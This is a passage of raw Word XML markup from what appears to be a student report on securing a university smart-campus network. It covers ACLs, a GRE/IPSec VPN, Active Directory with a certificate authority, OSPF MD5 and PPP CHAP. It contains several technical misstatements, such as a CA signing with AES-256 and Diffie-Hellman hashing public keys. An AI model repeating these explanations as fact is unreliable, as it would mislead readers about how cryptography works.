        <w:t xml:space="preserve"> HTTP</w:t>
      </w:r>
      <w:r w:rsidR="009B3763">
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="005A1912">
        <w:t xml:space="preserve"> traffic </w:t>
      </w:r>
      <w:r w:rsidR="009B3763">
        <w:t xml:space="preserve">only </w:t>
      </w:r>
      <w:r w:rsidR="005A1912">
        <w:t xml:space="preserve">into the DMZ server farm from unknown internet </w:t>
      </w:r>
      <w:r w:rsidR="009B3763">
        <w:t xml:space="preserve">sources </w:t>
      </w:r>
      <w:r w:rsidR="005A1912">
        <w:t xml:space="preserve">and also </w:t>
      </w:r>
      <w:r w:rsidR="009B3763">
        <w:t>an extended ACL was configured for the remote workers and external partner VPN’s so that they can access the DMZ server E-Mail, File server and HTTPS server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D35C50" w14:textId="38892B86" w:rsidR="00143236" w:rsidRDefault="00143236" w:rsidP="00320EBA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="015791F2" w14:textId="54CC3E86" w:rsidR="00143236" w:rsidRDefault="00143236" w:rsidP="00320EBA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A standard ACL was also applied to the Virtual Teletype (VTY) lines to only allow remote access to internetworking devices </w:t>
      </w:r>
      <w:r w:rsidR="009B3763">
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the administrator subnet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CFF6A8" w14:textId="77777777" w:rsidR="00DC04BD" w:rsidRPr="00895462" w:rsidRDefault="00DC04BD" w:rsidP="00895462">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60053850" w14:textId="4B5F8131" w:rsidR="00AA0348" w:rsidRDefault="00DA5262" w:rsidP="00022E47">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Site-to-Site </w:t>
      </w:r>
      <w:r w:rsidR="00AA0348">
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Generic Routing Encapsulation (GRE) </w:t>
      </w:r>
      <w:r w:rsidR="000E4A52">
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">IPv4 </w:t>
      </w:r>
      <w:r w:rsidR="00AA0348">
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>VPN Tunnel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EC16F5" w14:textId="4155CD0B" w:rsidR="00895462" w:rsidRDefault="00B27D61" w:rsidP="00895462">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00514C90">
        <w:t>A Site-to-Site GRE Virtual Private Network (VPN)</w:t>
      </w:r>
      <w:r w:rsidR="00514C90" w:rsidRPr="00514C90">
        <w:t xml:space="preserve"> is a secure encrypted tunnel</w:t>
      </w:r>
      <w:r w:rsidR="00514C90">
        <w:t xml:space="preserve"> that logically extends a LAN to another LAN </w:t>
      </w:r>
      <w:r w:rsidR="00B511AE">
        <w:t>via</w:t>
      </w:r>
      <w:r w:rsidR="00514C90">
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r w:rsidR="001343D0">
        <w:t xml:space="preserve"> public</w:t>
      </w:r>
      <w:r w:rsidR="00514C90">
        <w:t xml:space="preserve"> WAN</w:t>
      </w:r>
      <w:r w:rsidR="001343D0">
        <w:t xml:space="preserve"> i.e. the Internet</w:t>
      </w:r>
      <w:r w:rsidR="00514C90">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00B952D8">
        <w:t xml:space="preserve"> A VPN is utilised to encrypt </w:t>
      </w:r>
      <w:r w:rsidR="00B511AE">
        <w:t>traffic</w:t>
      </w:r>
      <w:r w:rsidR="00B952D8">
        <w:t xml:space="preserve"> traversing the Internet to prevent the data being intercepted by malicious actors in order to steal and /or change the information that is being transmitted from one LAN to another.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF488EE" w14:textId="6C35E687" w:rsidR="00514C90" w:rsidRDefault="00514C90" w:rsidP="00895462">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AD9C19A" w14:textId="34AFB49E" w:rsidR="00514C90" w:rsidRDefault="00514C90" w:rsidP="00895462">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">To create a </w:t>
      </w:r>
      <w:r w:rsidR="00AF5DCC">
        <w:t xml:space="preserve">site-to-site </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">VPN a </w:t>
      </w:r>
      <w:r w:rsidR="00AF5DCC">
        <w:t>security protocol suite</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AF5DCC">
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> utilised at each end of the </w:t>
      </w:r>
      <w:r w:rsidR="00B511AE">
        <w:t xml:space="preserve">GRE </w:t>
      </w:r>
      <w:r>
        <w:t>tunnel</w:t>
      </w:r>
      <w:r w:rsidR="00B511AE">
        <w:t xml:space="preserve"> interfaces,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> called IP Security (IPSec). To configure and create </w:t>
      </w:r>
      <w:r w:rsidR="00AF5DCC">
        <w:t>an</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> encrypted tunnel</w:t>
      </w:r>
      <w:r w:rsidR="001E336B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0026381C">
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidR="001E336B">
        <w:t xml:space="preserve"> Internet Key Exchange (IKE) protocol is utilised that comprises of </w:t>
      </w:r>
      <w:r w:rsidR="005512AB" w:rsidRPr="00514C90">
        <w:t>Internet Security Association and Key Management Protocol</w:t>
      </w:r>
      <w:r w:rsidR="005512AB">
        <w:t xml:space="preserve"> (ISAKMP) that is implemented within </w:t>
      </w:r>
      <w:r w:rsidR="001E336B">
        <w:t>two phases</w:t>
      </w:r>
      <w:r w:rsidR="005512AB">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E34822A" w14:textId="2F726325" w:rsidR="00AF5DCC" w:rsidRDefault="00AF5DCC" w:rsidP="00895462">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="683D83C5" w14:textId="1F7EC2FF" w:rsidR="00AF5DCC" w:rsidRDefault="00AF5DCC" w:rsidP="00895462">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF5DCC">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>IS</w:t>
      </w:r>
      <w:r w:rsidR="00DA5917">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF5DCC">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>KMP PHASE-1;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B511AE" w:rsidRPr="00674BCC">
        <w:t xml:space="preserve">This stage of the VPN </w:t>
      </w:r>
      <w:r w:rsidR="00827E0A">
        <w:t xml:space="preserve">is where the secure keys are </w:t>
      </w:r>
      <w:r w:rsidR="00B511AE" w:rsidRPr="00674BCC">
        <w:t>configure</w:t>
      </w:r>
      <w:r w:rsidR="00827E0A">
        <w:t>d and</w:t>
      </w:r>
      <w:r w:rsidR="00B511AE" w:rsidRPr="00674BCC">
        <w:t xml:space="preserve"> the security negotiation between each end of the VPN tunnel</w:t>
      </w:r>
      <w:r w:rsidR="00674BCC" w:rsidRPr="00674BCC">
        <w:t xml:space="preserve"> and the traffic keys</w:t>
      </w:r>
      <w:r w:rsidR="00196648">
        <w:t xml:space="preserve"> is performed</w:t>
      </w:r>
      <w:r w:rsidR="005512AB">
        <w:t xml:space="preserve"> by utilising an asymmetric</w:t>
      </w:r>
      <w:r w:rsidR="00674BCC" w:rsidRPr="00674BCC">
        <w:t xml:space="preserve"> Public Key Exchange (PKE)</w:t>
      </w:r>
      <w:r w:rsidR="005512AB">
        <w:t xml:space="preserve"> algorithm</w:t>
      </w:r>
      <w:r w:rsidR="001B22FB">
        <w:t xml:space="preserve"> such as Diffie-Hellman </w:t>
      </w:r>
      <w:r w:rsidR="005512AB">
        <w:t xml:space="preserve">to calculate the Public Key (PK) </w:t>
      </w:r>
      <w:r w:rsidR="001B22FB">
        <w:t xml:space="preserve">from the secret key, </w:t>
      </w:r>
      <w:r w:rsidR="007C68C4">
        <w:t>utilising</w:t>
      </w:r>
      <w:r w:rsidR="005512AB">
        <w:t xml:space="preserve"> two random large prime numbers, these numbers are then </w:t>
      </w:r>
      <w:r w:rsidR="00827E0A">
        <w:t xml:space="preserve">hashed </w:t>
      </w:r>
      <w:r w:rsidR="005512AB">
        <w:t xml:space="preserve">using a one way hashing </w:t>
      </w:r>
      <w:r w:rsidR="007C68C4">
        <w:t>algorithm</w:t>
      </w:r>
      <w:r w:rsidR="001B22FB">
        <w:t xml:space="preserve"> such as; Secure Hashing Algorithm – 256 bit (SHA-256)</w:t>
      </w:r>
      <w:r w:rsidR="005512AB">
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="001B22FB">
        <w:t xml:space="preserve">create a hashed </w:t>
      </w:r>
      <w:r w:rsidR="00827E0A">
        <w:t xml:space="preserve">value </w:t>
      </w:r>
      <w:r w:rsidR="001B22FB">
        <w:t>from the PK that was generated</w:t>
      </w:r>
      <w:r w:rsidR="00485D88">
        <w:t xml:space="preserve"> at</w:t>
      </w:r>
      <w:r w:rsidR="00827E0A">
        <w:t xml:space="preserve"> each of the LAN gateways so</w:t>
      </w:r>
      <w:r w:rsidR="00196648">
        <w:t xml:space="preserve"> that the secure key</w:t>
      </w:r>
      <w:r w:rsidR="00485D88">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00196648">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00485D88">
        <w:t>are</w:t>
      </w:r>
      <w:r w:rsidR="00196648">
        <w:t xml:space="preserve"> not broadcast across the unsecure Internet. ISAKMP</w:t>
      </w:r>
      <w:r w:rsidR="00674BCC">
        <w:t xml:space="preserve"> phase </w:t>
      </w:r>
      <w:r w:rsidR="00196648">
        <w:t xml:space="preserve">1 </w:t>
      </w:r>
      <w:r w:rsidR="00674BCC">
        <w:t xml:space="preserve">completes the </w:t>
      </w:r>
      <w:r w:rsidR="00827E0A">
        <w:t>Internet Key Exchange (IKE)</w:t>
      </w:r>
      <w:r w:rsidR="00674BCC">
        <w:t xml:space="preserve"> Security Associations (SA)</w:t>
      </w:r>
      <w:r w:rsidR="00196648">
        <w:t xml:space="preserve"> first stage of the VPN tunnel</w:t>
      </w:r>
      <w:r w:rsidR="00827E0A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48468446" w14:textId="77777777" w:rsidR="00AF5DCC" w:rsidRDefault="00AF5DCC" w:rsidP="00895462">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52524CC5" w14:textId="783EA746" w:rsidR="00AF5DCC" w:rsidRDefault="00AF5DCC" w:rsidP="00895462">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>IS</w:t>
      </w:r>
      <w:r w:rsidR="00DA5917">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>KMP PHASE-2</w:t>
      </w:r>
      <w:r w:rsidR="00DA5917">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidR="00D26F1B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00485D88" w:rsidRPr="00C93951">
        <w:t>This</w:t>
      </w:r>
      <w:r w:rsidR="00D26F1B" w:rsidRPr="00C93951">
        <w:t xml:space="preserve"> stage of the VPN receives the previously negotiated </w:t>
      </w:r>
      <w:r w:rsidR="00C93951" w:rsidRPr="00C93951">
        <w:t>Public Key (PK)</w:t>
      </w:r>
      <w:r w:rsidR="00F60D8C">
        <w:t xml:space="preserve"> from the first </w:t>
      </w:r>
      <w:r w:rsidR="001E336B">
        <w:t xml:space="preserve">phase of </w:t>
      </w:r>
      <w:r w:rsidR="005512AB">
        <w:t>ISKAMP (SA) to</w:t>
      </w:r>
      <w:r w:rsidR="001E336B">
        <w:t xml:space="preserve"> authenticate the VPN tunnel at both ends</w:t>
      </w:r>
      <w:r w:rsidR="0048406C">
        <w:t xml:space="preserve"> and applies the traffic encryption policy is applied</w:t>
      </w:r>
      <w:r w:rsidR="001E336B">
        <w:t xml:space="preserve">. The </w:t>
      </w:r>
      <w:r w:rsidR="0048406C">
        <w:t>data encryption algorithm is configured at this phase such as; AES-256 along with the SA lifetime of the tunnel in seconds</w:t>
      </w:r>
      <w:r w:rsidR="00F659AB">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A41980" w14:textId="3072FAB9" w:rsidR="00F659AB" w:rsidRDefault="00F659AB" w:rsidP="00895462">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46096007" w14:textId="66D0006E" w:rsidR="00F659AB" w:rsidRDefault="00F659AB" w:rsidP="00895462">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Once ISAKMP has been configured it is then applied to the Internet facing interface from each of the LAN’s to </w:t>
      </w:r>
      <w:r w:rsidR="00DD2730">
        <w:t xml:space="preserve">encrypt and </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">decrypt the data from each </w:t>
      </w:r>
      <w:r w:rsidR="00DD2730">
        <w:t>end</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of the VPN tunnel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AD611D" w14:textId="1A73779E" w:rsidR="00DD2730" w:rsidRDefault="00DD2730" w:rsidP="00895462">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F0E03A2" w14:textId="6C83678B" w:rsidR="005F7FF6" w:rsidRDefault="00DD2730" w:rsidP="00895462">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Within the UWTSD smart campus</w:t>
      </w:r>
      <w:r w:rsidR="00395616">
        <w:t xml:space="preserve"> LAN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005F7FF6">
        <w:t>a site</w:t>
      </w:r>
      <w:r w:rsidR="00395616">
        <w:t xml:space="preserve">-to-site IPv4 GRE </w:t>
      </w:r>
      <w:r>
        <w:t>VPN was configured at the Core router for communications between the IoT cloud datacentre and the remote workers and external partners</w:t>
      </w:r>
      <w:r w:rsidR="00395616">
        <w:t xml:space="preserve"> where a GRE VPN </w:t>
      </w:r>
      <w:r w:rsidR="005F7FF6">
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00395616">
        <w:t>unnel was also configured</w:t>
      </w:r>
      <w:r w:rsidR="005F7FF6">
        <w:t xml:space="preserve"> for secure communications</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320E4DCD" w14:textId="77777777" w:rsidR="005F7FF6" w:rsidRDefault="005F7FF6" w:rsidP="00895462">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AB0A2C9" w14:textId="5F5C8ABA" w:rsidR="00DD2730" w:rsidRPr="00DD2730" w:rsidRDefault="00DD2730" w:rsidP="00895462">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidR="005F7FF6">
        <w:t xml:space="preserve"> UWTSD</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VPN was created using the industry standard most secure configuration of a VPN utilising Diffie-Helman to create the </w:t>
      </w:r>
      <w:r w:rsidR="005F7FF6">
        <w:t>PK, SHA</w:t>
      </w:r>
      <w:r>
        <w:t>-256 to hash the PK and AES-256 military grade encryption to encrypt/decrypt the traffic at each end of the VPN gateways.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF1576D" w14:textId="77777777" w:rsidR="00D57C94" w:rsidRPr="00D57C94" w:rsidRDefault="00D57C94" w:rsidP="00D57C94">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="750F6DB9" w14:textId="06ECCF76" w:rsidR="00D57C94" w:rsidRDefault="00D57C94" w:rsidP="00022E47">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Active Directory (</w:t>
      </w:r>
      <w:r w:rsidR="005B41B2">
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>AD) and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Certificate Authority (CA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5672598C" w14:textId="7F741D68" w:rsidR="002D34E3" w:rsidRPr="002D34E3" w:rsidRDefault="007328B4" w:rsidP="00DD2730">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D34E3">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Active directory is a Windows domain and user management service that is utilised within a LAN to create domains within a </w:t>
      </w:r>
      <w:r w:rsidR="002D34E3" w:rsidRPr="002D34E3">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>LAN for network security segmentation of specific subnets that are controlled using privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CEE807" w14:textId="77777777" w:rsidR="002D34E3" w:rsidRPr="002D34E3" w:rsidRDefault="002D34E3" w:rsidP="00DD2730">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45DF8E86" w14:textId="5C792D1A" w:rsidR="00DD2730" w:rsidRDefault="002D34E3" w:rsidP="00DD2730">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D34E3">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>End user profiles and password are also created within AD along with their privilege within the network to access certain domains by issuing ‘Tickets’ that are</w:t>
      </w:r>
      <w:r w:rsidR="00595228">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> digital</w:t>
      </w:r>
      <w:r w:rsidRPr="002D34E3">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> network certificates that authenticate users that are issued by the CA within AD.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07042D00" w14:textId="463EFD91" w:rsidR="00595228" w:rsidRDefault="00595228" w:rsidP="00DD2730">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79926FBA" w14:textId="0ECCE8B0" w:rsidR="00595228" w:rsidRDefault="00595228" w:rsidP="00DD2730">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>The CA utilises AES-256 symmetrical encryption for signing digital signatures to prove their authenticity to prevent certificates being forged by malicious actors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66076B72" w14:textId="45B1E781" w:rsidR="00834724" w:rsidRDefault="00834724" w:rsidP="00DD2730">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EA97CC4" w14:textId="13B0E16F" w:rsidR="007328B4" w:rsidRPr="007F4313" w:rsidRDefault="00834724" w:rsidP="00DD2730">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Within the UWTSD ‘Smart Campus’ AD is utilised to add/remove users and passwords along with the CA to authenticate users and apply network privileges for domain and file access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F95C5D4" w14:textId="0AA1357A" w:rsidR="00AA0348" w:rsidRDefault="00AA0348" w:rsidP="00022E47">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>OSPF Message Digest 5 (MD5) Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658D3D18" w14:textId="77777777" w:rsidR="00261BCA" w:rsidRPr="00261BCA" w:rsidRDefault="00261BCA" w:rsidP="00261BCA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="4"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A831A79" w14:textId="35B96D75" w:rsidR="00FD5A2F" w:rsidRPr="007F4313" w:rsidRDefault="007F4313" w:rsidP="00FD5A2F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F4313">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">OSPF has been secured using Message Digest 5 (MD5) encryption of ‘Hello’ multicast messages to prevent a MitM attack so that malicious attackers cannot map the network and/or forge OSPF ‘Hello’ messages to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>execute</w:t>
      </w:r>
      <w:r w:rsidRPr="007F4313">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> a DoS attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23136F96" w14:textId="77777777" w:rsidR="00225DC2" w:rsidRPr="00FD5A2F" w:rsidRDefault="00225DC2" w:rsidP="00FD5A2F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="708ED7A9" w14:textId="361BC004" w:rsidR="00261BCA" w:rsidRDefault="00AA0348" w:rsidP="00261BCA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Point-to-Point Protocol (PPP) WAN Authentication</w:t>
      </w:r>
      <w:r w:rsidR="00514C90">
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> CHAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A230D1" w14:textId="6D9F08FC" w:rsidR="00261BCA" w:rsidRPr="00490A8E" w:rsidRDefault="00261BCA" w:rsidP="00261BCA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="4"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0928A935" w14:textId="54450DB5" w:rsidR="00261BCA" w:rsidRPr="00463501" w:rsidRDefault="00261BCA" w:rsidP="00261BCA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00463501">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Challenge Handshake Authentication Protocol (CHAP) that utilises MD5 encryption has been utilised between the routers within the WAN </w:t>
      </w:r>
      <w:r w:rsidR="00463501" w:rsidRPr="00463501">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">segment of the PT network </w:t>
      </w:r>
      <w:r w:rsidRPr="00463501">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">to authenticate </w:t>
      </w:r>
      <w:r w:rsidR="00463501" w:rsidRPr="00463501">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">point-to-point routers utilising usernames (Device </w:t>
      </w:r>
      <w:r w:rsidR="00490A8E" w:rsidRPr="00463501">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>name) and</w:t>
      </w:r>
      <w:r w:rsidR="00463501" w:rsidRPr="00463501">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00490A8E" w:rsidRPr="00463501">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>a password</w:t>
      </w:r>
      <w:r w:rsidR="00490A8E">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>, to prevent rogue routers being installed within the WAN by malicious actors to infiltrate the network. CHAP was applied to each serial interface within the PT topology.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D41254" w14:textId="77777777" w:rsidR="002907EF" w:rsidRPr="002907EF" w:rsidRDefault="002907EF" w:rsidP="002907EF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1124FA3F" w14:textId="5C13A869" w:rsidR="00022E47" w:rsidRPr="008A440A" w:rsidRDefault="006A105A" w:rsidP="00022E47">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A440A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Switchport </w:t>
      </w:r>
      <w:r w:rsidR="008A440A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Layer-2 </w:t>
      </w:r>
      <w:r w:rsidRPr="008A440A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Securit</w:t>
      </w:r>
      <w:r w:rsidR="00022E47" w:rsidRPr="008A440A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22131147" w14:textId="77777777" w:rsidR="008A440A" w:rsidRPr="008A440A" w:rsidRDefault="008A440A" w:rsidP="008A440A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="4"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4299FD8D" w14:textId="79B726C0" w:rsidR="008A440A" w:rsidRDefault="008A440A" w:rsidP="008A440A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
